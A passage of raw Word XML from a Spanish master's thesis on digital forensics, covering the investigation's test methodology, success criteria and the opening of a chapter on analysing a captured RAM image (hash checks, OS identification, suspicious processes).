          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La posible imputación de los hechos ocurridos y tomar posibles medidas legales contra el autor univoco de la acción detectada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78CD8F" w14:textId="77777777" w:rsidR="007B11B9" w:rsidRDefault="007B11B9" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD4E82B" w14:textId="4F8E91B6" w:rsidR="00B432EF" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Marco metodológico de las pruebas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E599D4" w14:textId="0FD2FEDF" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Las pruebas que se realizarán serán una investigación y un estudio temporal de los hechos ocurridos dentro del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B4AEE" w14:textId="7E2A2F39" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se emplearán herramientas de análisis forense en sus distintos sistemas operativos (Linux/Windows) para su detección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59868266" w14:textId="627CD37B" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">se tratará de arrancar el sistema virtualizado para posible </w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>carving</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Carving: En informática, se refiere a la técnica de extraer datos de un conjunto mayor, típicamente en la recuperación de datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de la información del disco duro por posible eliminación de pruebas por parte del posible infractor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1845594D" w14:textId="148F5CE4" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La planificación de las pruebas ha quedado detallada en la sección "planificación temporal de las tareas".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486B2EC" w14:textId="724CFF73" w:rsidR="00B432EF" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Criterios de éxito de las pruebas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CE6F2" w14:textId="565BEC5A" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis de los incidentes ocurridos con una justificación probatoria del mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44957F" w14:textId="4E7F444B" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Realización de un análisis de seguridad de las vulnerabilidades detectadas y una </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vía</w:t>
      </w:r>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de mitigación de </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>estos</w:t>
      </w:r>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB0AF5" w14:textId="23043202" w:rsidR="00B432EF" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cronograma de pruebas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBBB91" w14:textId="224E7472" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El cronograma de las pruebas ha quedado detallado en la sección "planificación temporal de las tareas".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FF506" w14:textId="6BC798CF" w:rsidR="000D10AB" w:rsidRPr="00B432EF" w:rsidRDefault="00B5632C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hitos importantes</w:t>
      </w:r>
      <w:r w:rsidR="00B432EF" w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, fechas de entrega de las PEC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DEFD7" w14:textId="30350A32" w:rsidR="000473CF" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4E146" w14:textId="0756DE90" w:rsidR="000D10AB" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc155782507"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:t>Análisis de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">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instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="762528C0" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B9141A" w14:textId="3CC4F25B" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El análisis forense de la memoria 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0473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un componente crítico en la investigación digital, pues permite a los analistas extraer información valiosa que no persiste una vez que el dispositivo se apaga. Esta volatilidad hace que la memoria RAM sea una fuente de evidencia esencial, especialmente en casos donde los procesos activos y la información en tránsito son relevantes para el caso. El presente capítulo detalla un enfoque metodológico estructurado para examinar de manera exhaustiva el contenido de la memoria RAM capturada de un sistema informático, con el objetivo de identificar y analizar aspectos críticos que contribuyan a la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E6F72" w14:textId="77777777" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Las acciones específicas que se abordarán son las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2DBD0C" w14:textId="69B41355" w:rsidR="000473CF" w:rsidRPr="00D54AC2" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comprobación del MD5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9C396" w14:textId="78D9A9C2" w:rsidR="000473CF" w:rsidRPr="00D54AC2" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identificación del Sistema Operativo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DED99E" w14:textId="6D61BEBC" w:rsidR="000473CF" w:rsidRPr="00D54AC2" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Búsqueda de Datos de Interés:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D54549" w14:textId="52D184FC" w:rsidR="000473CF" w:rsidRPr="00D54AC2" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Búsqueda de Procesos en Funcionamiento de Interés:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8BA3B3" w14:textId="4C903C5C" w:rsidR="000473CF" w:rsidRPr="00D54AC2" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Análisis y Extracción de Procesos Sospechosos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B4376" w14:textId="5A633E43" w:rsidR="000D10AB" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54AC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> resultado de este análisis exhaustivo proporcionará una comprensión detallada de lo que estaba ocurriendo en el sistema en el momento de la captura de la memoria. Esta información es invaluable para formar una imagen completa de los eventos bajo investigación y para establecer hechos concretos que puedan ser presentados como evidencia en un entorno judicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066A498" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6135D8CA" w14:textId="583A7F0A" w:rsidR="000D10AB" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc155782508"/>
      <w:r w:rsidRPr="000473CF">
        <w:t>3.1.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:t>Acciones previas al análisis de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">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instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1CB93024" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BF0C9F" w14:textId="11D48257" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="009440E4" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36C8CFA8" wp14:editId="11A9209D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>544996</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1787525" cy="635"/>
                <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="679175499" name="Cuadro de texto 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1787525" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="31B97E50" w14:textId="3D27B8DB" w:rsidR="009440E4" w:rsidRPr="00E0105C" w:rsidRDefault="009440E4" w:rsidP="009440E4">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                              <w:r w:rsidR="00117A4E">
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                                <w:t>8</w:t>
                              </w:r>
                            </w:fldSimple>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="31" w:name="_Toc155782575"/>
                            <w:r w:rsidRPr="00633BEF">
                              <w:t>Captura imagen hash archivos.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C8CFA8" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.55pt;margin-top:42.9pt;width:140.75pt;height:.05pt;z-index:2518773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JaFGgIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU99v2jAQfp+0/8Hy+wgw0VaIUDEqpkmo&#10;rUSnPhvHIZYcn3c2JOyv39lJoOv2NO3FufjO9+P7vlvct7VhJ4Veg835ZDTmTFkJhbaHnH9/2Xy6&#10;48wHYQthwKqcn5Xn98uPHxaNm6spVGAKhYySWD9vXM6rENw8y7ysVC38CJyy5CwBaxHoFw9ZgaKh&#10;7LXJpuPxTdYAFg5BKu/p9qFz8mXKX5ZKhqey9Cowk3PqLaQT07mPZ7ZciPkBhau07NsQ/9BFLbSl&#10;opdUDyIIdkT9R6paSwQPZRhJqDMoSy1VmoGmmYzfTbOrhFNpFgLHuwtM/v+llY+nnXtGFtov0BKB&#10;EZDG+bmnyzhPW2Idv9QpIz9BeL7AptrAZHx0e3c7m844k+S7+TyLObLrU4c+fFVQs2jkHImTBJU4&#10;bX3oQoeQWMmD0cVGGxN/omNtkJ0E8ddUOqg++W9RxsZYC/FVlzDeZNc5ohXafct0QR0OM+6hONPo&#10;CJ0qvJMbTfW2wodngSQDmpakHZ7oKA00OYfe4qwC/Pm3+xhP7JCXs4ZklXP/4yhQcWa+WeItanAw&#10;cDD2g2GP9Rpo0gktjZPJpAcYzGCWCPUrKX4Vq5BLWEm1ch4Gcx06cdPGSLVapSBSmhNha3dOxtQD&#10;ri/tq0DXsxKIzEcYBCfm78jpYhM9bnUMhHRiLuLaodjDTSpN3PcbFdfg7X+Kuu798hcAAAD//wMA&#10;UEsDBBQABgAIAAAAIQDLuxdm3gAAAAYBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyD&#10;tUhcEHVa2iqEOFVVwaFcKkIv3Nx4mwTidWQ7bfr3bE9w3JnRzNt8NdpOnNCH1pGC6SQBgVQ501Kt&#10;YP/59piCCFGT0Z0jVHDBAKvi9ibXmXFn+sBTGWvBJRQyraCJsc+kDFWDVoeJ65HYOzpvdeTT19J4&#10;feZy28lZkiyl1S3xQqN73DRY/ZSDVbCbf+2ah+H4+r6eP/ntftgsv+tSqfu7cf0CIuIY/8JwxWd0&#10;KJjp4AYyQXQK+JGoIF0wP7uzdLoAcbgKzyCLXP7HL34BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAI4iWhRoCAAA/BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAy7sXZt4AAAAGAQAADwAAAAAAAAAAAAAAAAB0BAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAH8FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="31B97E50" w14:textId="3D27B8DB" w:rsidR="009440E4" w:rsidRPr="00E0105C" w:rsidRDefault="009440E4" w:rsidP="009440E4">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                        <w:r w:rsidR="00117A4E">
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>8</w:t>
                        </w:r>
                      </w:fldSimple>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:bookmarkStart w:id="32" w:name="_Toc155782575"/>
                      <w:r w:rsidRPr="00633BEF">
                        <w:t>Captura imagen hash archivos.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="32"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251617280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ECBC904" wp14:editId="559841B2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>497398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3514090" cy="575945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="315910666"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14090" cy="575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73CF" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En el presente TFM, se nos ha proporcionado a los alumnos un archivo de captura de memoria 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0473CF" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> .mem. Por otro lado, se nos ha proporcionado los resúmenes o </w:t>
      </w:r>
      <w:r w:rsidR="000473CF" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
